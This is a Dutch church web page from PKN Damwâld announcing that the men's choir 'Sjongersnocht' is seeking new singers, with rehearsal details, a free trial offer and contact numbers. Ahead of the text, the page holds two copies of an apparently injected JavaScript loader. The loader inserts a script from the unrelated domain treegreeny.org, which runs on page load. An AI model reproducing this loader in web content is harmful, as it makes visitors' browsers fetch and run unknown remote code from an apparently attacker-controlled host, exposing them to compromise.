;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zing mee met de mannen van “Sjongersnocht” - PKN Damwâld

Zing mee met de mannen van “Sjongersnocht”

Gepubliceerd op: woensdag 27 september 2017

Wij, de 14 mannen van het Christelijke mannenkoor ‘Sjongersnocht’, repeteren iedere vrijdagavond in de Gereformeerde kerk, Foarwei 48 Damwâld onder leiding van onze gedreven dirigent Johanna van der Weide. Zo bereiden wij ons voor op optredens in tehuizen en bij kerkdiensten in de brede regio. De repetities beginnen afwisselend om 18.30 uur of 19.00 uur en stoppen om 20.30 uur; tussentijds is er uiteraard een (korte) pauze.

Wij kunnen nog wel wat extra stemmen gebruiken. Enthousiasme en plezier in zingen zijn belangrijker dan een goede zangstem. De liederen die we zingen zijn het genre liederen dat U kunt horen in het programma Prelude van Omrop Fryslân en in het programma Nederland Zingt van de EO.

Wij kunnen ons voorstellen dat er mannen zijn die denken: daar wil ik meer van weten. Wel heren, wilt u de sfeer proeven bij de repetities, dan bent u van harte welkom. U bent niet direct verplicht om lid te worden, wij bieden u aan om gedurende 2 maanden op de vrijdagavonden gratis met ons mee te repeteren. U kunt dus uitgebreid kennismaken met het koor, de dirigent en ons repertoire.
Op 8 oktober verlenen wij medewerking aan een kerkdienst in Akkerwoude, daar kunt u beluisteren hoe de gerepeteerde stukken in de praktijk van een optreden klinken.

Voor meer informatie mag u contact opnemen met:
Roel Buwalda (voorzitter) tel. 0511- 422688 Anne Brandsma (penningmeester) tel. 0511 – 422755 Wessel Rozendal (secretaris) tel. 0511 – 423712.